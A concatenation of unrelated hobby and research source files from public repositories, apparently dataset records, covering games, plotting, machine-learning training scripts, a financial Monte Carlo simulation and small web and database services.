expected_processed_metrics)\n\n\nif __name__ == '__main__':\n tf.test.main()\n","repo_name":"google-research/federated","sub_path":"personalization_benchmark/cross_device/algorithms/finetuning_utils_test.py","file_name":"finetuning_utils_test.py","file_ext":"py","file_size_in_byte":7598,"program_lang":"python","lang":"en","doc_type":"code","stars":610,"dataset":"github-code","pt":"83"} +{"seq_id":"35588392935","text":"import datetime\r\n\r\n# Função para validar o ano de nascimento\r\ndef validar_ano(ano):\r\n try:\r\n ano = int(ano) # Tenta converter a entrada para um número inteiro\r\n if 1922 <= ano <= 2021: # Verifica se o ano está dentro do intervalo permitido\r\n return True, ano\r\n else:\r\n return False, None\r\n except ValueError:\r\n return False, None\r\n\r\n# Função para calcular a idade com base no ano de nascimento\r\ndef calcular_idade(ano_nascimento):\r\n ano_atual = datetime.date.today().year # Obtém o ano atual\r\n idade = ano_atual - ano_nascimento\r\n return idade\r\n\r\n# Solicita o nome completo do usuário\r\nnome_completo = input(\"Digite seu nome completo: \")\r\n\r\n# Loop para obter o ano de nascimento válido\r\nwhile True:\r\n ano_nascimento = input(\"Digite o ano de nascimento (1922-2021): \")\r\n valido, ano_nascimento = validar_ano(ano_nascimento)\r\n if valido:\r\n break\r\n else:\r\n print(\"Ano de nascimento inválido. Por favor, tente novamente.\")\r\n\r\nidade = calcular_idade(ano_nascimento)\r\n\r\nprint(f\"Nome: {nome_completo}\")\r\nprint(f\"Idade em 2022: {idade} anos\")","repo_name":"Caio2a7/Proz_Codigos","sub_path":"analise_de_datas.py","file_name":"analise_de_datas.py","file_ext":"py","file_size_in_byte":1138,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"35562679225","text":"import textwrap\nfrom inspect import Parameter, signature\nfrom typing import Any, Callable, Optional, Sequence, Set, TypeVar, Union\n\nfrom typing_extensions import Concatenate, ParamSpec, TypeGuard\n\nR = TypeVar(\"R\")\nT = TypeVar(\"T\")\nP = ParamSpec(\"P\")\n\n\ndef get_valid_name_permutations(param_name: str) -> Set[str]:\n \"\"\"Get all underscore permutations for provided arg name.\"\"\"\n return {\n \"_\",\n param_name,\n f\"_{param_name}\",\n f\"{param_name}_\",\n }\n\n\ndef _is_param_valid(param: Parameter, expected_positional: str) -> bool:\n # The \"*\" character indicates that we permit any name for this positional parameter.\n if expected_positional == \"*\":\n return True\n\n possible_kinds = {Parameter.POSITIONAL_OR_KEYWORD, Parameter.POSITIONAL_ONLY}\n\n return (\n param.name in get_valid_name_permutations(expected_positional)\n and param.kind in possible_kinds\n )\n\n\ndef get_function_params(fn: Callable[..., Any]) -> Sequence[Parameter]:\n return list(signature(fn).parameters.values())\n\n\ndef validate_expected_params(\n params: Sequence[Parameter], expected_params: Sequence[str]\n) -> Optional[str]:\n \"\"\"Returns first missing positional, if any, otherwise None.\"\"\"\n expected_idx = 0\n for expected_param in expected_params:\n if expected_idx >= len(params) or not _is_param_valid(params[expected_idx], expected_param):\n return expected_param\n expected_idx += 1\n return None\n\n\ndef is_required_param(param: Parameter) -> bool:\n return param.default == Parameter.empty\n\n\ndef positional_arg_name_list(params: Sequence[Parameter]) -> Sequence[str]:\n accepted_param_types = {\n Parameter.POSITIONAL_OR_KEYWORD,\n Parameter.POSITIONAL_ONLY,\n }\n return [p.name for p in params if p.kind in accepted_param_types]\n\n\ndef param_is_var_keyword(param: Parameter) -> bool:\n return param.kind == Parameter.VAR_KEYWORD\n\n\ndef format_docstring_for_description(fn: Callable) -> Optional[str]:\n if fn.__doc__ is not None:\n docstring = fn.__doc__\n if len(docstring) > 0 and docstring[0].isspace():\n return textwrap.dedent(docstring).strip()\n else:\n first_newline_pos = docstring.find(\"\\n\")\n if first_newline_pos == -1:\n return docstring\n else:\n return (\n docstring[: first_newline_pos + 1]\n + textwrap.dedent(docstring[first_newline_pos + 1 :])\n ).strip()\n else:\n return None\n\n\n# Type-ignores are used throughout the codebase when this function returns False to ignore the type\n# error arising from assuming\n# When/if `StrictTypeGuard` is supported, we can drop `is_context_not_provided` since a False from\n# `has_at_least_one_parameter` will be sufficient.\ndef has_at_least_one_parameter(\n fn: Union[Callable[Concatenate[T, P], R], Callable[P, R]],\n) -> TypeGuard[Callable[Concatenate[T, P], R]]:\n return len(get_function_params(fn)) >= 1\n","repo_name":"alfredosa/dagster-meltano","sub_path":".venv/lib/python3.10/site-packages/dagster/_core/decorator_utils.py","file_name":"decorator_utils.py","file_ext":"py","file_size_in_byte":3005,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"83"} +{"seq_id":"19481514817","text":"import requests\nimport json\n\nurl = \"https://jsonplaceholder.typicode.com/todos\"\n\nrequest_paylod = {\n \"userId\": 125485,\n \"id\": 222525,\n \"title\": \"Anil test\",\n \"completed\": 'true'\n }\n\nhead = {\n 'Content-Type' : 'application/Text',\n}\n\nhead = {\n 'Content-Type' : 'application/Json',\n}\n\n# Lessoon Learned : if we sent the different header type then system will respond with 500 error i.e. internal server error\nresponse = requests.post(url=url,data=request_paylod,headers=head)\nprint(response.status_code)","repo_name":"apalkumar/ForAzureDevopsDemo","sub_path":"postAPI.py","file_name":"postAPI.py","file_ext":"py","file_size_in_byte":537,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"28025605885","text":"#Matplotlib\r\n\r\nfrom matplotlib import pyplot as plt\r\nfrom matplotlib import style \r\n\r\n#style.use('ggplot')\r\n\r\nx = [5,6,7,8]\r\ny = [7,3,8,3]\r\n\r\nprint(len(x))\r\nprint(len(y))#Do these to tackel the error written in last comment\r\n\r\nplt.plot(x,y,'g', linewidth=5, label = 'Line One')\r\n\r\n#'g' sets it to green,linewidth changes the line width\r\n\r\nplt.title('Dumb Chart')\r\nplt.ylabel('Y-Axis')\r\nplt.xlabel('X-Axis')\r\nplt.legend()\r\n#Use legend after all the plotting is done.\r\n#We can change the position of the legend\r\nplt.grid(True, color = 'k')\r\n\r\nplt.show()\r\n\r\n#plt.show() brings up the graph\r\n#We need to reshow for updating, when using live feeds\r\n\r\n#If we have more x's than y's, then we will get a\r\n#value error saying x and y must have same first dimension\r\n\r\n\r\n","repo_name":"Calm-Rock/Learning_Python","sub_path":"43rdmatplotliblegends.py","file_name":"43rdmatplotliblegends.py","file_ext":"py","file_size_in_byte":761,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"37792414754","text":"# %%\nimport argparse\nfrom pathlib import Path\nimport sys\nsys.path.append(\"../\")\n\nfrom pro_gan.gan import ProGANTrainer\nfrom pro_gan.losses import StandardGAN, WganGP, LSGAN\n\nimport tensorflow as tf\ntf.config.run_functions_eagerly(True)\n\n# %%\ndef parse_arguments():\n \"\"\"\n command line arguments parser\n :return: args => parsed command line arguments\n \"\"\"\n parser = argparse.ArgumentParser()\n\n parser.add_argument(\n \"--save_dir\",\n action=\"store\",\n type=str,\n default=\"./test_train\",\n help=\"path to save the training logs and model checkpoints\",\n )\n\n parser.add_argument(\n \"--data_dir\",\n action=\"store\",\n type=str,\n default=\"/work/CELEBAHQ/train\",\n help=\"path to the training data\",\n required=True,\n )\n\n parser.add_argument(\n \"--latent_size\",\n action=\"store\",\n type=int,\n default=512,\n help=\"latent size for the generator\",\n )\n\n parser.add_argument(\n \"--depth\",\n action=\"store\",\n type=int,\n default=10,\n help=\"defines the resolution, 2 ** depth, of the generated images once training is done\",\n )\n\n parser.add_argument(\n \"--dis_learning_rate\",\n action=\"store\",\n type=float,\n default=0.001,\n help=\"discriminator training learning rate\",\n )\n\n parser.add_argument(\n \"--gen_learning_rate\",\n action=\"store\",\n type=float,\n default=0.001,\n help=\"generator training learning rate\",\n )\n\n parser.add_argument(\n \"--epochs\",\n action=\"store\",\n type=int,\n default=40,\n help=\"training epochs for each depth\",\n )\n\n parser.add_argument(\n \"--crop_size\",\n action=\"store\",\n type=int,\n default=None,\n help=\"crop training data to square images\",\n )\n\n parser.add_argument(\n \"--start_depth\",\n action=\"store\",\n type=int,\n default=2,\n help=\"start training from models with resolution 2 ** start_depth\",\n )\n\n parser.add_argument(\n \"--fade_in_percentage\",\n action=\"store\",\n type=int,\n default=50,\n help=\"percentage of epochs per resolution to use fade-in \\\n (for fading in the new layers; not used for 4 x 4 models, \\\n but a dummy value is still needed)\",\n )\n\n args = parser.parse_args()\n\n return args\n\n\ndef main(args):\n batch_sizes = [256, 256, 128, 64, 16, 6, 3, 2, 1][:args.depth - 1]\n\n progan_trainer = ProGANTrainer(\n depth=args.depth,\n latent_size=args.latent_size,\n use_ema=False,\n save_dir=Path(args.save_dir),\n gen_learning_rate=args.gen_learning_rate,\n dis_learning_rate=args.dis_learning_rate,\n )\n\n with tf.device(\"/gpu:0\"):\n progan_trainer.train(\n data_dir=Path(args.data_dir),\n epochs=[args.epochs] * (args.depth - 1),\n fade_in_percentages=[args.fade_in_percentage] * (args.depth - 1),\n batch_sizes=batch_sizes,\n crop_size=args.crop_size,\n start_depth=args.start_depth,\n loss_fn=WganGP(),\n feedback_factor=20,\n checkpoint_factor=20,\n )\n\nif __name__ == \"__main__\":\n main(parse_arguments())\n\n\"\"\"\npython3 train_pro_gan.py --data_dir \"/work/CELEBAHQ/train\" --epochs 10\n\"\"\"\n","repo_name":"yueying-teng/pro_gan_tf2","sub_path":"notebooks/train_pro_gan.py","file_name":"train_pro_gan.py","file_ext":"py","file_size_in_byte":3429,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"40225151148","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom machine_learning.clustering.k_means.lib.k_means import KMeans\nfrom machine_learning.clustering.hierarchical_clustering.agglomerative_clustering import AgglomerativeClustering\n \ndef generate_ball(x, radius, m): \n r = radius * np.random.rand(m)\n pi = 3.14\n theta = 2 * pi * np.random.rand(m)\n B = np.zeros((m,2))\n for i in range(m):\n B[i][0] = x[0] + r[i] * np.cos(theta[i])\n B[i][1] = x[1] + r[i] * np.sin(theta[i])\n return B\n\nB1 = generate_ball([0,0], 1, 100)\nB2 = generate_ball([0,2], 1, 100)\nB3 = generate_ball([5,1], 0.5, 10)\nX = np.concatenate((B1, B2, B3), axis=0)\n\nkmeans = KMeans(n_clusters = 2)\nkm_centers, km_assignments = np.array(kmeans.fit_transform(X))\n\nagg = AgglomerativeClustering(n_clusters = 2)\nagg_centers, agg_assignments = agg.fit_transform(X)\n\nplt.figure(7)\nplt.axis([-2, 6, -2, 4])\nplt.scatter(X[:,0], X[:,1], c='y')\n\nplt.figure(8)\nplt.axis([-2, 6, -2, 4])\nplt.scatter(X[:,0], X[:,1], c='y')\nplt.scatter(km_centers[:,0], km_centers[:,1], c='b', marker='*', s=300)\n\nplt.figure(9)\nplt.axis([-2, 6, -2, 4])\nplt.scatter(X[:,0], X[:,1], c='y')\nplt.scatter(agg_centers[:,0], agg_centers[:,1], c='b', marker='*', s=300)\nplt.show()\n\n\n\n\n\n \n \n\n\n\n\n\n\n \n \n \n\n\n\n\n\n\n\n\n\n\n \n \n \n \n \n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"246622/machine-learning","sub_path":"machine_learning-master/Codes/clustering/hierarchical_clustering/kmeans_vs_hierarchical.py","file_name":"kmeans_vs_hierarchical.py","file_ext":"py","file_size_in_byte":1349,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"74238219150","text":"import sys\nimport os\n\n\n# frame rate that will be used for all wav files\nAUDIO_FRAME_RATE = 22050\n# number of pcm frames for fft window\nAUDIO_WINDOW_SIZE = 2048\n# extensions to look for inside the input directory\nVIDEO_EXT = ['avi', 'mkv', 'flv', 'wmv', 'mp4', 'm4v', 'mpeg', 'mpg']\n\n\n# place to store trash\nTMP_DIR = '/home/lelloman/PycharmProjects/python-introcutter/tmp'\n# since i'm using a common folder it's better to clean it\nCLEAN_TMP = True\n# hide ffmpeg command output from terminal\nVERBOSE = False\nSTD_OUT = sys.stdout if VERBOSE else open(os.devnull, 'w')\nSTD_ERR = sys.stderr if VERBOSE else open(os.devnull, 'w')\n\n# command to invoke ffmpeg\nFFMPEG = 'ffmpeg'\n# command to invoke ffprobe\nFFPROBE = 'ffprobe'\n\n\n# the path of the video to extract the intro\nINTRO_VIDEO_FILE = '/home/lelloman/Downloads/Futurama Season 1/Futurama [1x01] The Space Pilot 3000.avi'\n# starting position in seconds of the intro in the given video\nINTRO_START_S = 180\n# duration in seconds of the intro\nINTRO_DURATION_S = 27\n\n\n# all videos found here will be converted\nINPUT_DIR = '/home/lelloman/Downloads/Futurama Season 2 (copy)'\n# place to store all new videos without intro\nOUTPUT_DIR = '/home/lelloman/PycharmProjects/python-introcutter/output'\n# rename new files with this string + the old name\nOUTPUT_PREFIX = 'nointro_'\n\n","repo_name":"lelloman/python-introcutter","sub_path":"conf.py","file_name":"conf.py","file_ext":"py","file_size_in_byte":1316,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"73464366350","text":"import numpy as np\r\nfrom sklearn.preprocessing import LabelEncoder \r\nfrom sklearn.model_selection import train_test_split \r\nfrom tensorflow.keras.models import Sequential \r\nfrom tensorflow.keras.layers import Dense, Dropout, Flatten, Conv2D, MaxPooling2D\r\nimport matplotlib.pyplot as plt\r\nfrom var2 import gen_data\r\n\r\nx, y = gen_data(1000)\r\n\r\nx_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.2)\r\nx_train = x_train.astype('float32')\r\nx_test = x_test.astype('float32')\r\nx_train = x_train.reshape(x_train.shape[0], 50, 50, 1)\r\nx_test = x_test.reshape(x_test.shape[0], 50, 50, 1)\r\n\r\nencoder = LabelEncoder()\r\nencoder.fit(y_test)\r\ny_test = encoder.transform(y_test)\r\nencoder.fit(y_train)\r\ny_train = encoder.transform(y_train)\r\n\r\nmodel = Sequential()\r\nmodel.add(Conv2D(32, kernel_size=(3, 3), activation='relu', input_shape=(50, 50, 1)))\r\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\r\nmodel.add(Dropout(0.25))\r\nmodel.add(Conv2D(64, kernel_size=(3, 3), activation='relu', input_shape=(50, 50, 1)))\r\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\r\nmodel.add(Flatten())\r\nmodel.add(Dropout(0.5))\r\nmodel.add(Dense(1, activation='sigmoid'))\r\n\r\nmodel.compile(optimizer='adam', loss='binary_crossentropy', metrics=['accuracy'])\r\nH = model.fit(x_train, y_train, epochs=10, batch_size=16, validation_split=0.1)\r\nmodel.evaluate(x_test, y_test)","repo_name":"Ksenox/ANN-2021","sub_path":"8383/Babenko/pr/6/pr6.py","file_name":"pr6.py","file_ext":"py","file_size_in_byte":1347,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"33646263954","text":"from PIL import Image\nimport numpy as np\n\nclass ImageProcessor:\n\n def __init__(self):\n self.accepted_formats = ['.jpg', '.png']\n \n def validate_image_format(self, file):\n ext = f'.{file.filename.split(\".\")[-1]}'\n\n if not ext in self.accepted_formats:\n raise Exception(f'Invalid image format: \\'{ext}\\'. Allowed formats are: {\",\".join(self.accepted_formats)}')\n\n \n \n def pre_process_images(self, files):\n pre_processed_files = []\n\n for file in files:\n # Load RGB image \n img = Image.open(file).convert(\"RGB\")\n\n # Resize image to specified image dimensions\n img = img.resize((224,224),Image.ANTIALIAS)\n\n # Rescale the image\n img = np.array(img)/255\n\n # Convert tensor to 4D\n img = np.expand_dims(img, 0)\n\n pre_processed_files.append(img)\n\n return np.concatenate(pre_processed_files)","repo_name":"MattJKirby/ML-Dog-Facial-Recognition-FYP","sub_path":"recognition-service/recognition_service/imageProcessor.py","file_name":"imageProcessor.py","file_ext":"py","file_size_in_byte":854,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"10677403059","text":"def solution(genres, plays):\n answer = []\n genre = {}\n play = {}\n for i in range(len(genres)):\n if genres[i] not in genre: genre[genres[i]] = plays[i]\n else: genre[genres[i]] += plays[i]\n genre = sorted(genre.items(), key = lambda x: -x[1])\n play = [[genres[i], plays[i], i] for i in range(len(plays))]\n play = sorted(play, key = lambda x: -x[1])\n for i in genre:\n count = 0\n for j in play:\n if(j[0] == i[0]):\n count += 1\n if(count > 2): break\n else: answer.append(j[2])\n return answer\n","repo_name":"yeonwoo8528/Algorithm-Study","sub_path":"3회차/베스트앨범.py","file_name":"베스트앨범.py","file_ext":"py","file_size_in_byte":597,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"30272621905","text":"import json\nimport sys\n\nimport tensorflow as tf\nimport os\n\nfrom tensorflow.keras import mixed_precision\n\n# configuration\nfrom Utils.enums import User, Environment, Accelerator\n\nuser = User.Arash\nenvironment = Environment.GoogleColab\naccelerator = Accelerator.GPU\n\nbatch_size = 64\nlatent_dim = 100\nepochs = 10\nsupervised_samples_ratio = 0.05\nsave_interval = 17\nsuper_batches = 1\nunsuper_batches = 1\nprefetch_no = tf.data.AUTOTUNE\neager_execution = True\nmodel_summery = False\nresume_training = False\n\n\ndef parse_args():\n # Parsing Arguments\n global user\n global environment\n global accelerator\n global batch_size\n global latent_dim\n global epochs\n global supervised_samples_ratio\n global save_interval\n global super_batches\n global unsuper_batches\n global prefetch_no\n global eager_execution\n global model_summery\n for arg in sys.argv:\n if arg.lower().__contains__(\"user\"):\n param = arg[arg.index(\"=\") + 1:]\n if param.lower() == \"arash\":\n user = User.Arash\n elif param.lower() == \"kinza\":\n user = User.Kinza\n if arg.lower().__contains__(\"envi\"):\n param = arg[arg.index(\"=\") + 1:]\n if param.lower() == \"local\":\n environment = Environment.Local\n elif param.lower() == \"colab\":\n environment = Environment.GoogleColab\n elif param.lower() == \"research\":\n environment = Environment.GoogleResearch\n if arg.lower().__contains__(\"accel\"):\n param = arg[arg.index(\"=\") + 1:]\n if param.lower() == \"gpu\":\n accelerator = Accelerator.GPU\n elif param.lower() == \"tpu\":\n accelerator = Accelerator.TPU\n if arg.lower().__contains__(\"batch\"):\n param = arg[arg.index(\"=\") + 1:]\n batch_size = int(param)\n if arg.lower().__contains__(\"epoch\"):\n param = arg[arg.index(\"=\") + 1:]\n epochs = int(param)\n if arg.lower().__contains__(\"sample_ratio\"):\n param = arg[arg.index(\"=\") + 1:]\n supervised_samples_ratio = float(param)\n if arg.lower().__contains__(\"save_interval\"):\n param = arg[arg.index(\"=\") + 1:]\n save_interval = int(param)\n if arg.lower().__contains__(\"super_batches\"):\n param = arg[arg.index(\"=\") + 1:]\n super_batches = int(param)\n if arg.lower().__contains__(\"unsuper_batches\"):\n param = arg[arg.index(\"=\") + 1:]\n unsuper_batches = int(param)\n if arg.lower().__contains__(\"eager\"):\n param = arg[arg.index(\"=\") + 1:]\n if param.lower().__contains__(\"false\"):\n eager_execution = False\n else:\n eager_execution = True\n if arg.lower().__contains__(\"model_sum\"):\n param = arg[arg.index(\"=\") + 1:]\n if param.lower().__contains__(\"false\"):\n model_summery = False\n else:\n model_summery = True\n\n\ndef configure(enable_xla: bool = True,\n print_device_placement: bool = False,\n enable_eager_execution: bool = True,\n only_cpu: bool = False,\n enable_memory_growth: bool = True,\n enable_mixed_float16: bool = False):\n # Configurations\n #########################################################\n # To enable xla compiler\n if enable_xla:\n os.environ['TF_XLA_FLAGS'] = '--tf_xla_enable_xla_devices'\n #########################################################\n # To print out on which device operation is taking place\n if print_device_placement:\n tf.debugging.set_log_device_placement(True)\n #########################################################\n # To disable eager execution and use graph functions\n if not enable_eager_execution:\n tf.compat.v1.disable_eager_execution()\n #########################################################\n # To disable GPUs\n if only_cpu:\n os.environ['CUDA_VISIBLE_DEVICES'] = '-1'\n #########################################################\n # Setting memory growth\n gpus = tf.config.list_physical_devices('GPU')\n if enable_memory_growth and gpus:\n try:\n tf.config.experimental.set_memory_growth(gpus[0], True)\n except \"Invalid Device\":\n # Invalid device or cannot modify virtual devices once initialized.\n pass\n #########################################################\n # Create 2 virtual GPUs with 1GB memory each\n # if gpus:\n # try:\n # tf.config.experimental.set_virtual_device_configuration(\n # gpus[0],\n # [tf.config.experimental.VirtualDeviceConfiguration(memory_limit=1024),\n # tf.config.experimental.VirtualDeviceConfiguration(memory_limit=1024)])\n # logical_gpus = tf.config.experimental.list_logical_devices('GPU')\n # print(len(gpus), \"Physical GPU,\", len(logical_gpus), \"Logical GPUs\")\n # except RuntimeError as e:\n # # Virtual devices must be set before GPUs have been initialized\n # print(e)\n #########################################################\n # Using mixed_precision to activate Tensor Cores\n if enable_mixed_float16:\n mixed_precision.set_global_policy('mixed_float16')\n #########################################################\n # Configurations\n","repo_name":"kindle-coder/UM-PDD","sub_path":"configs.py","file_name":"configs.py","file_ext":"py","file_size_in_byte":5492,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"11142261958","text":"from typing import List\nfrom wordle import Wordle, WordleLengthException\n\n\nclass bcolors:\n OKGREEN = '\\033[92m'\n WARNING = '\\033[93m'\n FAIL = '\\033[91m'\n ENDC = '\\033[0m'\n\n\ndef print_guess_check(guess: str, check: List[int]) -> None:\n \"\"\"\n Pretty prints the guess of the user depending on its accuracy\n :param guess:\n :param check:\n \"\"\"\n print(f''.join([f'{bcolors.OKGREEN if check[i] == 2 else bcolors.WARNING if check[i] == 1 else bcolors.FAIL} {g} {bcolors.ENDC}' for i, g in enumerate(guess.upper())]))\n\n\ndef game_loop(wordle: Wordle) -> None:\n \"\"\"\n Game loop. Asks the user for a guess until he does it right or it has no more tries left.\n \"\"\"\n # print(wordle)\n\n tries_left = 5\n while tries_left > 0:\n try:\n guess = input(f'What is your guess? - (Lives: {tries_left}): ')\n if len(guess) != 5:\n raise WordleLengthException('Length should be 5 characters')\n\n check = wordle.check(guess)\n print_guess_check(guess, check)\n\n if sum(check) == 10:\n print('CORRECT!')\n break\n\n tries_left -= 1\n\n except Exception as e:\n print('ERROR:', e)\n\n if tries_left == 0:\n print('Too bad, I am sorry...')\n print(f'The solution was {wordle}')\n\n\nif __name__ == '__main__':\n choice = True\n wordle = Wordle()\n while choice:\n wordle.generate_wordle()\n game_loop(wordle)\n choice = 1 if input('Do you want another round? (y/N) ') == 'y' else 0\n\n print('Thanks for playing!')\n","repo_name":"jorgegomzar/PyWordle","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1599,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"74189221710","text":"from random import choice\nimport string\n\nriddle = ['python', 'java', 'kotlin', 'javascript']\n\nprint(\"H A N G M A N\")\nanswer = choice(riddle)\nhint = \"-\" * (len(answer))\nletter_set = set(answer)\ntries = 8\nuser_guesses = []\n\n\ndef ft_check_input(char):\n user_guesses.append(char)\n if len(char) != 1:\n return \"You should print a single letter\"\n elif char not in string.ascii_lowercase:\n return \"It is not an ASCII lowercase letter\"\n elif user_guesses.count(char) > 1:\n return \"You already typed this letter\"\n return 0\n\n\ndef ft_game():\n global answer, hint, tries\n while tries > 0:\n print(f'\\n{hint}')\n if \"-\" not in hint:\n print(\"\"\"You guessed the word!\nYou survived!\"\"\")\n break\n char = input('Input a letter: ')\n if ft_check_input(char) != 0:\n print(ft_check_input(char))\n continue\n if char in letter_set:\n counter = 0\n for n in answer:\n if char == n:\n hint = list(hint)\n hint[counter] = n\n hint = \"\".join(hint)\n counter += 1\n else:\n print(\"No such letter in the word\")\n tries -= 1\n else:\n print(\"You are hanged!\")\n\n\ndef ft_menu():\n while True:\n menu = input('Type \"play\" to play the game, \"exit\" to quit: ')\n if menu == \"play\":\n ft_game()\n elif menu == \"exit\":\n break\n else:\n continue\n\n\nft_menu()\n","repo_name":"Lucimore/Hangman","sub_path":"Hangman/task/hangman/hangman.py","file_name":"hangman.py","file_ext":"py","file_size_in_byte":1527,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"83"} +{"seq_id":"2941067966","text":"import numpy as np\nimport numpy.random as npr\nfrom pylab import plt\nimport scipy.stats as scs\n\n'''\nBSM model with the Euler scheme discretisation.\nShort rate and the volatility can vary in time. \nHere we apply the square root diffusion to the volatility \n(Heston stochastic volatility model). \nWith the Cholesky matrix we model\nthe correlation between the market and v(t).\n'''\n\nS0 = 100.\nr = 0.05\nv0 = 0.1 # Initial value of the volatility\nkappa = 3.0 # Mean reversion factor (how fast it goes to the asymptotic value)\ntheta = 0.25 # Long-term mean value (asymptotic value)\nsigma = 0.1\nrho = -0.6 # Fixed correlation between the two Brownian motions.\nT = 1.0\nnti = 100 # number of time intervals\nn_p = 100000 # Number of paths\ndt = T/nti\n\ncorr_mat = np.zeros((2, 2))\ncorr_mat[0, :] = [1.0, rho]\ncorr_mat[1, :] = [rho, 1.0]\ncho_mat = np.linalg.cholesky(corr_mat) # Cholesky decomposition\nprint(cho_mat) # resulting matrix\nran_num = npr.standard_normal((2, nti + 1, n_p)) # three-dimensional random number data set.\nv = np.zeros_like(ran_num[0])\nvh = np.zeros_like(v)\nv[0] = v0\nvh[0] = v0\nfor t in range(1, nti + 1):\n ran = np.dot(cho_mat, ran_num[:, t, :])\n vh[t] = (vh[t - 1] +\n kappa * (theta - np.maximum(vh[t - 1], 0)) * dt +\n sigma * np.sqrt(np.maximum(vh[t - 1], 0)) *\n np.sqrt(dt) * ran[1])\n\nv = np.maximum(vh, 0)\n\nS = np.zeros_like(ran_num[0])\nS[0] = S0\nfor t in range(1, nti + 1):\n ran = np.dot(cho_mat, ran_num[:, t, :])\n S[t] = S[t - 1] * np.exp((r - 0.5 * v[t]) * dt + np.sqrt(v[t]) * ran[0] * np.sqrt(dt))\n\nstat = scs.describe(S[-1])\n#print(\"mean \", stat[2], np.mean(S[-1]))\n#print(\"std \", stat[3]**0.5, np.std((S[-1])))\n\nfig, (ax1, ax2) = plt.subplots(1, 2, figsize=(8, 8))\nax1.hist(S[-1], bins=50, weights=np.ones(len(S[-1])) / len(S[-1]))\nax1.set_xlabel('index level')\nax1.set_ylabel('frequency')\nax2.hist(v[-1], bins=50, weights=np.ones(len(v[-1])) / len(v[-1]))\nax2.set_xlabel('volatility')\nplt.savefig('Fig/b-hists')\n\nfig, (ax1, ax2) = plt.subplots(2, 1, sharex=True, figsize=(8, 8))\nax1.plot(S[:, :10], lw=1.5)\nax1.set_ylabel('index level')\nax2.plot(v[:, :10], lw=1.5)\nax2.set_xlabel('time intervals (max = 1 year)')\nax2.set_ylabel('volatility')\nplt.savefig('Fig/b-paths')\nplt.show()\n","repo_name":"marcofpsantoni/SFinance","sub_path":"BSM&beyond/b-BSM+Volatility(t).py","file_name":"b-BSM+Volatility(t).py","file_ext":"py","file_size_in_byte":2261,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"29346732129","text":"\nfrom concurrent import futures\nimport logging\nimport mensaje_pb2_grpc as mensajepb2\nfrom mensaje_pb2_grpc import ItemService\nfrom mensaje_pb2 import Response\nimport grpc\nimport psycopg2\nimport sys\n\n\nconn = psycopg2.connect(\n host=\"localhost\",\n database=\"tiendita\",\n user=\"postgres\",\n password=\"marihuana\")\ncur = conn.cursor()\n\n\nclass ServicioItems(ItemService):\n def GetItem(self,request,context):\n introredis = str(sys.argv[1])\n cur.execute('SELECT * FROM ITEMS WHERE Name LIKE %s OR Price LIKE %s OR Category LIKE %s OR Count LIKE %s')(introredis)\n return Response()\n \n\n\n\n\ndef serve():\n server = grpc.server(futures.ThreadPoolExecutor(max_workers=10))\n # mensaje_pb2_grpc.add_GreeterServicer_to_server(Greeter(), server)\n server.add_insecure_port('[::]:50051')\n server.start()\n server.wait_for_termination()\n print(\"Servidor Arriba\")\n\nif __name__ == '__main__':\n serve()\n\n\n\n\n\n","repo_name":"lagossully/Sistemas_Distribuidos","sub_path":"Tarea_1/App/Tarea1/API/DB_server.py","file_name":"DB_server.py","file_ext":"py","file_size_in_byte":940,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"42426224825","text":"from util import *\n\n\n@apply\ndef apply(given, scale, div=False):\n lhs, rhs = given.of(LessEqual)\n if div:\n le = lhs / scale <= rhs / scale\n else:\n le = lhs * scale <= rhs * scale\n return le, scale > 0\n\n\n@prove\ndef prove(Eq):\n from axiom import algebra\n\n x, y, z = Symbol(real=True, given=True)\n Eq << apply(LessEqual(x, y), z, div=True)\n\n Eq << algebra.gt_zero.le.imply.le.mul.apply(Eq[2], Eq[1])\n\n\nif __name__ == '__main__':\n run()\n# created on 2019-08-19\n","repo_name":"cosmosZhou/sympy","sub_path":"axiom/algebra/le/given/et/scale/positive.py","file_name":"positive.py","file_ext":"py","file_size_in_byte":497,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"83"} +{"seq_id":"17586245649","text":"from flask import Blueprint, jsonify, session, request\nfrom app.models import db, Transfer\nfrom ..forms import TransferForm\nfrom datetime import datetime\nfrom flask_login import current_user\nfrom ..utils import to_dict_list, form_errors_obj_list, print_data\n\ntransfer_routes = Blueprint('transfer', __name__)\n\n\n@transfer_routes.route(\"/\")\ndef get_user_transfers():\n '''\n get a list of ALL current users transfers\n '''\n\n current_user_id = current_user.to_dict()[\"id\"]\n\n transfer_data = Transfer.query.filter(Transfer.user_id == current_user_id)\n\n\n if transfer_data:\n transfer_list = to_dict_list(transfer_data)\n return transfer_list\n else:\n return {\"error\": \"No transfers made for this user\"}\n\n# ------------------------------------------------------------------------------\n@transfer_routes.route(\"/\", 